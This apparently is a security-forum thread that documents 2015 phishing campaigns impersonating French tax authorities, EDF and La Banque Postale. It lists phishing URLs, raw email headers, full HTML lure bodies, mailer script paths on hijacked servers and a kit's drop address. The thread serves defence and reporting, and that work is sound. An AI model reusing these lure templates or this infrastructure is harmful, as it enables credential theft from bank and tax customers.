http://www.ovedroo.com/wp-includes/ID3/remboursement/Pays/France/127b280f1817677899dea16af27e44fb/redirection.php
http://www.parricide.nl/Notification/impots.gouv.fr/file/66ef90700c90c74548471ee174d710ea/redirection.php
http://www.phillipspinturaydecoracion.es/wp-content/themes/twentyeleven/imp/c5a6c2c96a10b8a147bfa3385d5abef8/redirection.php
http://www.recouvrement-f-secure-accountimpot-gouv.com/service-impot.gouvfrance.fr/redirection.php
http://www.recouvrement-fino-account-secure-impotgouv.com/service-impot.gouvfrance.fr/redirection.php
http://www.recouvrement-info-accountapplstore.com/info-impot.gouvfrance.fr/redirection.php
http://www.reouvrement-info-secure-accountimpot.com/Centre.Impot.Gouv.fr/redirection.php
http://www.rostovbroker.com/impots.rembouresement.fr/id/2dd1ecc301599770f7bb45eb5645f037/redirection.php
http://www.verifiateurgenerale-info-accountapplestorez.com/service-impot.gouvfrance.fr/redirection.php
http://www.youthpilgrimage.com/media/impot/a08eadff4ec418c6ec2b398f306d635e/redirection.php
http://youthpilgrimage.com/media/impot/23db74f07237b1a90343e6b3d0de9b2a/redirection.php
http://youthpilgrimage.com/media/impot/2d839b3805915850d4ddb5034ae0dbcf/redirection.php
https://www.girlynightsout.com/impots.gouv.fr/3963ef9d4a04fdedd864da7b8a4ec7aa/redirection.php
https://www.girlynightsout.com/impots.gouv.fr/48ba4a4e75b3c70fdb1104d05c6d0a81/redirection.php
https://www.girlynightsout.com/impots.gouv.fr/8765eb6c980fae84c0f762995f3a1fc2/redirection.php
https://www.girlynightsout.com/impots.gouv.fr/d7180d102a6cae7150c4ff6b6ddbdd41/redirection.php
We can note mejujuy.gov.ar as well as ville-gueret.fr (two public administration sites).

rosa.wpc.gov.lk was used to send the spam.
Code:
x-store-info:4r51+eLowCe79NzwdU2kR0zqpsRfiBoycNOl1Rdc4We2piva5OFMIYkZ8ZcnMsOYQ6GY8Y10brp+5HpX1aqznyCrSgotCC4+ZXfQo0KngGSZYI+WbEu/aeAQac6MGtFme5W53rrn47c=
Authentication-Results: hotmail.com; spf=none (sender IP is 222.165.135.195) smtp.mailfrom=www-data@rosa.wpc.gov.lk; dkim=none header.d=dgfip.finances.gouv.fr; x-hmca=none header.id=impots.gouv@dgfip.finances.gouv.fr
X-SID-PRA: impots.gouv@dgfip.finances.gouv.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTngJmlahZDJ8EjQLaEW3nL5G3jG1XAvnSuFKQZhWbswaDYI25eOsYz6YK6RSFoMRBWnNPU3HFrfOHWCAwmEJPE+fNYLISPM+uY+P8yj4i0nk6rIPoAGnjensZPLBRAuHoPNuzp900SUDvVavsczpthKgUaQ8kYxOAZR+T6GvRacGswvkBMT/M02H4Vw0m5+WZUkEe+vz6oQFPRD4ac3L2Fcx/Xh4TmB+jPuFYZESwButA==
Received: from localhost ([222.165.135.195]) by BAY004-MC2F31.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.23143);
	 Thu, 27 Aug 2015 21:40:05 -0700
Received: by localhost (Postfix, from userid 33)
	id 30B471F712C; Fri, 28 Aug 2015 06:44:30 +0530 (IST)
Date: Fri, 28 Aug 2015 06:44:30 +0530
To: ************@live.fr
From: "Impots.gouv.fr" <impots.gouv@dgfip.finances.gouv.fr>
Reply-To: impots.gouv@dgfip.finances.gouv.fr
Subject: Important : Avis de remboursement !‏
Message-ID: <403424263c4534abff276f7087728dc2@wpc.gov.lk>
X-Priority: 3
X-Mailer: PHPMailer (phpmailer.sourceforge.net) [version ]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="iso-8859-1"
Return-Path: www-data@rosa.wpc.gov.lk
X-OriginalArrivalTime: 28 Aug 2015 04:40:06.0830 (UTC) FILETIME=[9D1A7CE0:01D0E14B]

<div class="ecxgmail_extra">
<div class="ecxgmail_quote">
<table height="302" align="center" border="0" cellpadding="0" cellspacing="0" width="623" style="color:rgb(34, 34, 34);font-family:arial, sans-serif;font-size:13px;padding:0px;border:0px none;border-spacing:0px;">
    <tbody style="padding:0px;border:0px;">
        <tr style="padding:0px;border:0px;">
            <td width="632" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;"><br />
             </td>
            <td valign="bottom" width="168" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;"> </td>
        </tr>
        <tr style="padding:0px;border:0px;">
            <td colspan="2" height="100" width="632" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;">
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"><img alt="" src="https://ci3.googleusercontent.com/proxy/S7Ecs1UTkIp5q8QItQKopJ7gqpByYD1qd-FDb8BRPQhiOpbq0jcCROmfh35zRiClxG3EGaRYlXkwBzwZez1YAqmhguSFmzQE4Afk=s0-d-e1-ft#http://sebastien-bruneau.fr/site/pluxml/images/RF.png" height="109" width="191" style="" /></p>
            </td>
        </tr>
        <tr style="padding:0px;border:0px;">
            <td colspan="2" height="25" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;"><br />
            <br />
            <br />
            <table border="0" cellpadding="10" cellspacing="0" width="100%" style="padding:0px;border:0px;border-spacing:0px;color:rgb(68, 68, 68);font-family:'Helvetica Neue', Helvetica, Arial, sans-serif;font-size:12px;">
                <tbody style="padding:0px;border:0px;">
                    <tr style="padding:0px;border:0px;">
                        <td width="45%" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;">Cher(e) client(e)<br />
                         </td>
                    </tr>
                    <tr style="padding:0px;border:0px;">
                        <td style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;color:rgb(136, 136, 136);">
                        <p style="padding:0px;line-height:1.3em;width:auto;"> </p>
                        <p style="padding:0px;line-height:1.3em;width:auto;">Après les derniers calculs de vos impots sur le revenu, nous avons déterminé que vous</p>
                        <p style="padding:0px;line-height:1.3em;width:auto;">êtes admissible à recevoir un remboursement d'un montant de 410.00 £</p>
                        <p style="padding:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"><span style="color:rgb(105, 105, 105);"><span style="font-size:11px;">Nous vous invitons à consulter les démarches a suivre en </span></span><font color="#5a5a5a" face="helvetica, arial, sans-serif" style="font-size:11px;line-height:14px;"><font color="#1155cc"><a href="http://www.recouvrement-info-accountapplstore.com/info-impot.gouvfrance.fr/redirection.php?g4d3bdOsiuarHDdBl0bEP6dBVy_wP1WJ6XZDh7nemRp9bv2mHJ0HYZaZV6xWExsS" target="_blank">cliquant-ici.</a></font></font></p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        </td>
                    </tr>
                </tbody>
            </table>
            </td>
        </tr>
    </tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" align="center" style="padding:0px;border-spacing:0px;color:rgb(68, 68, 68);font-family:Arial, Verdana, Helvetica, sans-serif;font-size:12px;width:490px;height:126px;">
    <tbody style="padding:0px;border:0px;">
        <tr style="padding:0px;border:0px;">
            <td width="632" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;">
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;">Cordialement,</p>
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;">impots.gouv.fr- Direction générale des Finances Publiques</p>
            </td>
        </tr>
    </tbody>
</table>
<blockquote class="ecxgmail_quote" style="border-left:1px #ccc solid;padding-left:1ex;"><br />
</blockquote></div>
</div>
</div>
<p><style type="text/css"><!--
.ExternalClass .ecxhmmessage P {
padding:0px;
}

.ExternalClass body.ecxhmmessage {
font-size:12pt;
font-family:Calibri;
}

--></style></p
Code:
x-store-info:4r51+eLowCe79NzwdU2kR3P+ctWZsO+J
Authentication-Results: hotmail.com; spf=none (sender IP is 222.165.135.195) smtp.mailfrom=www-data@rosa.wpc.gov.lk; dkim=none header.d=impotsgouv.fr; x-hmca=none header.id=contact@impotsgouv.fr
X-SID-PRA: contact@impotsgouv.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTmq2TL8uNVlsaOLoCq9/2qS02Od7nb+qQYK/rZuG3gjAZB5Nzw6BMB8vPkJ+c3kiTo7BlACIfWR0blSKIGqvNOvYtU9JGMDPA/V3QDLYG4kYEu3nuLwSIjL+dl1c7lNT6h3zAtNhoARh+U3Pdv/U5fuKZITNqaTa2ooe4ass9glm3/5pGrjlB/mS7/g9XMpqbZmxfaxyQ/Wa2f4BA2dOBViBHk2nb5rA/UTz6Bko51LRA==
Received: from localhost ([222.165.135.195]) by COL004-MC5F21.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.23143);
	 Thu, 27 Aug 2015 13:03:30 -0700
Received: by localhost (Postfix, from userid 33)
	id D0AAA207389; Fri, 28 Aug 2015 01:28:55 +0530 (IST)
Date: Fri, 28 Aug 2015 01:28:55 +0530
To: ********@live.fr
From: "Impots.Gouv.fr" <contact@impotsgouv.fr>
Reply-To: contact@impotsgouv.fr
Subject: Avis de votre reglement !
Message-ID: <8d4e7c845e05a94f95e8828ad3cfe0e0@wpc.gov.lk>
X-Priority: 3
X-Mailer: PHPMailer (phpmailer.sourceforge.net) [version ]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="iso-8859-1"
Return-Path: www-data@rosa.wpc.gov.lk
X-OriginalArrivalTime: 27 Aug 2015 20:03:31.0028 (UTC) FILETIME=[722A7140:01D0E103]

<div class="ecxgmail_extra">
<div class="ecxgmail_quote">
<table height="302" align="center" border="0" cellpadding="0" cellspacing="0" width="623" style="color:rgb(34, 34, 34);font-family:arial, sans-serif;font-size:13px;padding:0px;border:0px none;border-spacing:0px;">
    <tbody style="padding:0px;border:0px;">
        <tr style="padding:0px;border:0px;">
            <td width="632" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;"><br />
             </td>
            <td valign="bottom" width="168" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;"> </td>
        </tr>
        <tr style="padding:0px;border:0px;">
            <td colspan="2" height="100" width="632" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;">
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"><img alt="" src="https://ci3.googleusercontent.com/proxy/S7Ecs1UTkIp5q8QItQKopJ7gqpByYD1qd-FDb8BRPQhiOpbq0jcCROmfh35zRiClxG3EGaRYlXkwBzwZez1YAqmhguSFmzQE4Afk=s0-d-e1-ft#http://sebastien-bruneau.fr/site/pluxml/images/RF.png" height="109" width="191" style="" /></p>
            </td>
        </tr>
        <tr style="padding:0px;border:0px;">
            <td colspan="2" height="25" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;"><br />
            <br />
            <br />
            <table border="0" cellpadding="10" cellspacing="0" width="100%" style="padding:0px;border:0px;border-spacing:0px;color:rgb(68, 68, 68);font-family:'Helvetica Neue', Helvetica, Arial, sans-serif;font-size:12px;">
                <tbody style="padding:0px;border:0px;">
                    <tr style="padding:0px;border:0px;">
                        <td width="45%" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;">Cher(e) client(e)<br />
                         </td>
                    </tr>
                    <tr style="padding:0px;border:0px;">
                        <td style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;color:rgb(136, 136, 136);">
                        <p style="padding:0px;line-height:1.3em;width:auto;"> </p>
                        <p style="padding:0px;line-height:1.3em;width:auto;">Après les calculs de vos impots sur le revenu, nous avons déterminé que vous</p>
                        <p style="padding:0px;line-height:1.3em;width:auto;">êtes admissible à recevoir un remboursement d'un montant de 218.75 euros;</p>
                        <p style="padding:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"><span style="color:rgb(105, 105, 105);"><span style="font-size:11px;">Nous vous invitons à consulter les démarches a suivre en </span></span><font color="#5a5a5a" face="helvetica, arial, sans-serif" style="font-size:11px;line-height:14px;"><font color="#1155cc"><a href="http://reouvrement-info-secure-accountimpot.com/Centre.Impot.Gouv.fr/index.html"_blank">cliquant-ici.</a></font></font></p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        </td>
                    </tr>
                </tbody>
            </table>
            </td>
        </tr>
    </tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" align="center" style="padding:0px;border-spacing:0px;color:rgb(68, 68, 68);font-family:Arial, Verdana, Helvetica, sans-serif;font-size:12px;width:490px;height:126px;">
    <tbody style="padding:0px;border:0px;">
        <tr style="padding:0px;border:0px;">
            <td width="632" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;">
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;">Très cordialement,</p>
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;">impots.gouv.fr-Direction Générale des finances publiques</p>
            </td>
        </tr>
    </tbody>
</table>
<blockquote class="ecxgmail_quote" style="border-left:1px #ccc solid;padding-left:1ex;"><br />
</blockquote></div>
</div>
</div>
<p><style type="text/css"><!--
.ExternalClass .ecxhmmessage P {
padding:0px;
}

.ExternalClass body.ecxhmmessage {
font-size:12pt;
font-family:Calibri;
}

--></style></p>
Code:
http://www.recouvrement-info-accountapplstore.com/info-impot.gouvfrance.fr/redirection.php?g4d3bdOsiuarHDdBl0bEP6dBVy_wP1WJ6XZDh7nemRp9bv2mHJ0HYZaZV6xWExsS
VT: 0/63
VT: 0/63 - UQ - UQ2

• dns: 8 ›› ip: 62.149.128.163 - adress: REOUVREMENT-INFO-SECURE-ACCOUNTIMPOT.COM
• dns: 8 ›› ip: 62.149.128.163 - adress: RECOUVREMENT-INFO-ACCOUNTAPPLSTORE.COM

Some mailers:
Code:
X-PHP-Script: rejuveniceretail.com/wp-admin/includes/saltonindex.php for 185.81.157.89
X-PHP-Script: www.dragonleisure.bt/cache/1.php for 45.217.61.71
X-PHP-Script: movielink.ml/templates/beez3/mailerxd.php for 185.81.158.114
X-PHP-Script: idpstyle.com/admin/web/area/-/b1.php for 185.81.158.114

And finally a mail address dumped from one hijacked server (e-mail addresses vary between domains; a copy of the kit can be found in the attachment)
Code:
$to = "keane010203@gmail.com";
ID PhishTank: { #3426025 | #3426027 | #3426028 | #3426033 | #3426036 | #3426037 | #3428903 }
Attachments
infected
(206.07 KiB) Downloaded 48 times
 #26629  by Xylitol
 Mon Aug 31, 2015 8:42 pm
Fresh phishing e-mail campaign targeting 'EDF' and LBP ('La banque Postale', a French bank); mails received with a one-minute interval.

Électricité de France:
Code:
x-store-info:4r51+eLowCe79NzwdU2kR0zqpsRfiBoycNOl1Rdc4Wed3CG6v4CKRes1BLQziKkwBaiDV1n0fnUS/zPaKTjCreAUN7rjFFIzuQcA5OPTc7UP7vHtSVgYEHAXp4l8d1isGAFHxSjaMwE=
Authentication-Results: hotmail.com; spf=none (sender IP is 203.98.87.50) smtp.mailfrom=service@free.fr; dkim=none header.d=free.fr; x-hmca=none header.id=service@free.fr
X-SID-PRA: service@free.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD0w
X-Message-Info: L86biS6VcGqhXgJjcPpdO+AbBDqiCEFo7hzj6vjHdwYGauGjg7wwkAz+oaYZfsnkJlEyf/vij5lArfxAaJ0/wt0fbyyUcm8y+HkNYqyuiopQODnMRYdPr+z6QVLRoUfuSOguS5dQkvfTWdLbvsHepvc+o4H/86HD8sr+Mckgv724IbBPTVObbL9+AH5Z4E2QFZ0wMIFjY6O0TQMbxoURwnFbhfHAy6FIS78cWM6psrFP5I5H8lBtog==
Received: from post.internet.net.au ([203.98.87.50]) by COL004-MC4F6.hotmail.com with Microsoft SMTPSVC(7.5.7601.23143);
	 Mon, 31 Aug 2015 11:01:00 -0700
Received: from localhost (localhost.localdomain [127.0.0.1])
	by post.internet.net.au (Postfix) with ESMTP id 4A77A1A04851;
	Thu, 27 Aug 2015 14:45:09 +1000 (EST)
X-Virus-Scanned: amavisd-new at post.internet.net.au
Received: from post.internet.net.au ([127.0.0.1])
	by localhost (post.internet.net.au [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id SlLdURo0kuBb; Thu, 27 Aug 2015 14:45:08 +1000 (EST)
Received: from vps193522 (210.ip-149-202-63.eu [149.202.63.210])
	by post.internet.net.au (Postfix) with ESMTPA id DF5791A04FD0;
	Thu, 27 Aug 2015 08:21:40 +1000 (EST)
From: "Votre espace Client EDF" <service@free.fr>
Subject: Non =?ISO-8859-1?Q?R=E9ception?= de paiement
To: phinex-electro@live.fr
Content-Type: text/html;iso-8859-1
Reply-To: service@free.fr
Date: Thu, 27 Aug 2015 00:22:00 +0200
X-Priority: 3
X-Library: Indy 8.0.25
Message-Id: <20150826222149.DF5791A04FD0@post.internet.net.au>
Return-Path: service@free.fr
X-OriginalArrivalTime: 31 Aug 2015 18:01:15.0722 (UTC) FILETIME=[07A292A0:01D0E417]

<h1><a href="https://mobile-reid.com/"><img alt="" src="http://i57.tinypic.com/9a7azc.jpg" /></a></h1>
mobile-reid.com is redirecting to esapces-abonnes.com and uses a CloudFlare SSL cert.

• dns: 2 ›› ip: 104.27.146.32 - adress: MOBILE-REID.COM
DNS->IP :: MOBILE-REID.COM {'88.198.188.38'}
• dns: 1 ›› ip: 88.198.188.38 - adress: lite.xisto.com

• dns: 2 ›› ip: 141.101.127.237 - adress: ESAPCES-ABONNES.COM
DNS->IP :: ESAPCES-ABONNES.COM {'103.6.198.208'}
• dns: 1 ›› ip: 103.6.198.208 - adress: msv33-nut.mschosting.com

Worth a read: https://blog.malwarebytes.org/fraud-sca ... hing-scam/
ID PhishTank: { #3430806 | #3430807 }
Just a reminder to report at CloudFlare: https://www.cloudflare.com/abuse/ and eventually if you have questions: @xxdesmus (Trust & Safety at CloudFlare)

La banque postale:
Code:
x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=pass (sender IP is 212.227.126.131) smtp.mailfrom=auth@email.com; dkim=none header.d=email.com; x-hmca=pass header.id=auth@email.com
X-SID-PRA: auth@email.com
X-AUTH-Result: PASS
X-SID-Result: PASS
X-Message-Status: s1:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MTtHRD0xO1NDTD0y
X-Message-Info: NhFq/7gR1vTPM1R1iMPiq4UFLtScayhKeBcje9By0+wMf424NIe5Nfq37WqznclPKzHRqjdnVd4L0JhL37tmGvg16zJYCiwfxpleph5H2/ap209goBPxymXlxYPg5VViTP6qyLUjRlYlTUoZnf5CVQmj4bT8Hfh3dqOB9jMjbcKcJxmu1xtU4thnrQ3IkO6OvLwzVZ8FjdKIQn9ui2SM59fCmEoij8eHrJqPPdgZQZ/GV9IfLCQP7g==
Received: from mout.kundenserver.de ([212.227.126.131]) by BAY004-MC1F58.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.23143);
	 Mon, 31 Aug 2015 11:02:49 -0700
Received: from [10.0.1.5] ([207.195.226.231]) by mrelayeu.kundenserver.de
 (mreue003) with ESMTPA (Nemesis) id 0Lpis6-1Z0xow2hnS-00fSOx for
 <***********@live.fr>; Mon, 31 Aug 2015 20:02:48 +0200
Message-Id: <EQ4QDFXW-PMZS-BZWH-3QH5-JGERADAOGKP@email.com>
Mime-Version: 1.0
From: La banque postale <auth@email.com>
To: "phoenixbytes" <***********@live.fr>
Subject: =?iso-8859-1?Q?Votre_demande_d'adh=E9sion_en_ligne_?=
Date: Mon, 31 Aug 2015 13:02:42 -0500
X-Bounce-Tracking-Info: <cGhvZW5peGJ5dGVzCQkJcGhvZW5peGJ5dGVzQGxpdmUuZnIJVm90cmUgZGVtYW5kZSBkJ2FkaMOpc2lvbiBlbiBsaWduZSAJMjAwCQkxOTk5CWJvdW5jZQlubwlubw==>
Content-type: multipart/alternative; Boundary="--=BOUNDARY_831132_LOBO_QLJV_BWBV_UVIN"
X-Provags-ID:  V03:K0:sPtGn3lyKy0ITvO/vtrEW1BIhF0hxOPUnUnWFIc6mFy4WEt7D0O
 H+DN6/JMdYEabd+6ptgjzf7ZRW1s/P9mfVcWWSiZEjWsTc+7H6gl0kd7nJjY6jveO4n9qFe
 K8IDPwU4UtA3807nns+ODCZHRbKSRCWGj3CH+oknvAPk5sm3pAvRQ1g4mzQJnnEJpeePNuS
 44vH7e5Ky0CmqWc3zOgQA==
X-UI-Out-Filterresults: notjunk:1;V01:K0:QGySSxkyaGo=:ZHpYv4SzjCNiIZRoRwyThl
 7RoaPmYvohWN82JbdTt9amE1rRa5uzbmv5IX9ZD3Vnvb4KMtDfKzjnD1uT/KNVqyFqA+HhMxr
 POEh5ACuoDmq2QdfeCVuz9c6WiE7ySnFdHy9l/nUUjJkPU8i/luyUd8FjL7zPLE6iVRSAST2x
 S6l7A0fXUbg+rWK4bc/EfXcBvo+I2gDIxiDvSU5ckXS+W2hgImiJFERfuqv1v5ZuKqafH/prz
 lK/GxU7U/gz5sag3FOle91DUuSTGZBlbBqOcY/JlEeDEssewIWkEt6tFqAdNSjnch5dV/9wbg
 Ixr29KWPpor5MDvP+nj/FyF+HjlYDRwmLxZjNztrD1a18+9m5g0PciAGnu3KU7CtD1aIBylLB
 LvFL1Cnuy4yToOlG7gk0aIan2NDOU87nD49BoEeiYL3Rrq6H6oYv38gmWbrQBtjoOHunRrcdN
 iQaZSq+wY07XYmHqT/WY1E32zOi2BMUfWJFGWmW9LciN9sn58f4HjjWkf6wqP+jm2rzucxVDd
 /HNb5JuyvHKHpjwpKOJQgn71J9x5svEfckBH9Wdf4WHNVcfpXkCDZQ4G/ZWZyqsuEJMDxYdyZ
 x+gXtLlYWpaC9xVD3REgXoTpJhD/34uwOY/AbOi8RBgK88bHkhbLQnZF6ciHsI5vjv9dW/HS6
 JYUHUDHK3w3J1UkBsHFZQk/lzHfjmv+EmMm5bbgU8YJS1UAOtWPQrSNt4kaPAbVjhduuWEQUG
 ZZCbTbcP3DPtOStgCTjlqWoyUpUBBwkgmg/FcnUzS3IytHDPTVBLMUYbeAq5Tz1zL2WeoKgSn
 7OX9wU6fo1+xdqGieGZ65OA3nVy4pO+wTmmHwuYauq7g0xvVjUdGYbmHcAc75gODiVmjQjQ1J
 /oyCkA0X2Zh9PR9EufYVpUfBhoPSVwMoQ6H+dWGxc=
Return-Path: auth@email.com
X-OriginalArrivalTime: 31 Aug 2015 18:02:50.0453 (UTC) FILETIME=[40196050:01D0E417]
This message is in MIME format. Since your mail reader does not understandthis format, some or all of this message may not be legible.
----=BOUNDARY_831132_LOBO_QLJV_BWBV_UVIN
Content-type: text/plain; charset=iso-8859-1; format=flowed
Content-transfer-encoding: quoted-printable
cher(e) client(e),
 Nous avons d=E9tect=E9 une activit=E9 suspecte sur votre compte la banque
postale et l'avons temporairement verrouill=E9 par pr=E9caution=2E
 Nous fournissons des outils qui contribuent =E0 votre s=E9curit=E9 lorsque=
vous utilisez la banque postale=2E
&nbsp;&nbsp;Prot=E9gez votre compte maintenant
 &nbsp;Merci de la confiance que vous nous t=E9moignez  Cordialement,
objet
Velkommen til Surftown
voir l'en-t=EAte complet fermer l'en-t=EAte
 Return-Path: <cs@surftown=2Ecom>
Received: from mwinf5c26 (mwinf5c26=2Eme-wanadoo=2Enet [10=2E223=2E111=
=2E76]) by
mwinb1g06 with LMTPA; Mon, 22 Jun 2015 17:05:15 +0200
X-Sieve: CMU Sieve 2=2E3
Received: from controlpanel=2Esurftown=2Ecom ([212=2E97=2E130=2E36]) by mwi=
nf5c26
with ME id jT5F1q0030nFlhg01T5FwH; Mon, 22 Jun 2015 17:05:15 +0200
X-bcc: cairequejaime@orange=2Efr
X-ME-bounce-domain: orange=2Efr
X-ME-engine: default
X-me-spamcause: (0)(0000)gggruggvucftvghtrhhoucdtuddrfeekvddrudefgdekgecute=
fuodetggcurfh
rohhfihhlvgemucfogfdpggftiffpkfenuceurghilhhouhhtmecugedtt
denucenucfjughrpefvufffhffkrffoggfgtgeshhektddthedtjeenucfhrhhomhepufhur
hhfthhofihnuceotghssehsuhhrfhhtohifnhdrtghomheqnecuffhomhg
rihhnpehsuhhrfhhtohifnhdrtghomhenucfrrghrrghmpehhvghloheptghonhhtrhholhh
prghnvghlrdhsuhhrfhhtohifnhdrtghomhdpihhnvghtpedvuddvrdelj
edrudeftddrfeeipdhmrghilhhfrhhomheptghssehsuhhrfhhtohifnhdrtghomhdprhgtp
hhtthhopegtrghirhgvqhhuvghjrghimhgvsehorhgrnhhgvgdrfhhr
X-me-spamlevel: not-spam
X-ME-Helo: controlpanel=2Esurftown=2Ecom
X-ME-IP: 212=2E97=2E130=2E36
X-ME-Entity: ofr
Received: by controlpanel=2Esurftown=2Ecom (Postfix, from userid 33) id
E1F2DD4007C; Mon, 22 Jun 2015 17:05:14 +0200 (CEST)
To: cairequejaime@orange=2Efr
Subject: Velkommen til Surftown
X-PHP-Originating-Script: 33:class=2Ephpmailer=2Ephp
Date: Mon, 22 Jun 2015 17:05:14 +0200
From: Surftown <cs@surftown=2Ecom>
Message-ID:
<93599f5caee009d1286e9c7cde0ada5c@controlpanel=2Esurftown=2Ecom>
X-Priority: 3
X-Mailer: PHPMailer 5=2E2=2E2
(http://code=2Egoogle=2Ecom/a/apache-extras=2Eorg/p/phpmailer/)
MIME-Version: 1=2E0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset=3Dutf-8
 Velkommen til Surftown
Hej stret
 Velkommen til Surftown! Vi er glade for, at du har valgt Surftown som
webhotel til din hjemmeside og e-mail=2E
 Indenfor de n=E6ste 5 minutter bliver dit webhotel oprettet, og du vil
modtage en e-mail fra med login-oplysninger til vores kontrolpanel=2E I
kontrolpanelet kan du administrere dit webhotel og dine dom=E6ner=2E Fra
kontrolpanelet kan du ogs=E5 kontakte supporten=2E
 Office 365 Hvis du har bestilt et produkt der indeholder Office 365,
s=E5 vil du modtage en separat email herom indenfor 24 timer=2E Dit Office
365 produkt fornyes =E5rligt sammen med dit webhotel, og kan opsiges
=E5rligt ved fornyelsestidspunktet=2E
 F=F8lg os p=E5 de sociale medier Mens du venter p=E5 at dit webhotel blive=
r
klar, kan du med fordel bruge et par minutter p=E5 at f=F8lge Surftown p=
=E5
Facebook, Twitter og Google+=2E
 Her kan du l=F8bende blive opdateret om nye produkter og tjenester fra
Surftown, samt f=E5 gode r=E5d til hvordan du f=E5r mest muligt ud af dit
webhotel=2E Du vil ogs=E5 kunne holde dig opdateret p=E5 den aktuelle drift=
og deltage i konkurrencer=2E
 Sp=F8rgsm=E5l? Hvis du har sp=F8rgsm=E5l, s=E5 kontakt gerne vores salgsaf=
deling
p=E5 telefon +45 70 70 24 74=2E Salgsafdelingen kan tr=E6ffes alle hverdage=
mellem klokken 9 og 16=2E
 Du er ogs=E5 velkommen til at kontakte os her:
https://controlpanel=2Esurftown=2Ecom/tickets/new/
 Tak for din bestilling=2E
 Venlig hilsen, Surftown
----=BOUNDARY_831132_LOBO_QLJV_BWBV_UVIN
Content-type: text/html; charset=iso-8859-1
Content-transfer-encoding: quoted-printable
<HTML>
<BODY>
<P><IMG border=3D0 hspace=3D0 alt=3D"" align=3Dbaseline src=3D"http://www=
=2Esimamm=2Ecom/postale=2Epng"></P>
<P>cher(e) <STRONG>client(e),</STRONG><BR></P>
<P>
<TABLE style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WIDTH: 5=
80px; BORDER-COLLAPSE: collapse; FONT: 11px/15px LucidaGrande, tahoma, verd=
ana, arial, sans-serif; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR:=
 rgb(68,68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px" cellSpac=
ing=3D0 cellPadding=3D0>
<TBODY style=3D"LINE-HEIGHT: 15px">
<TR style=3D"LINE-HEIGHT: 15px">
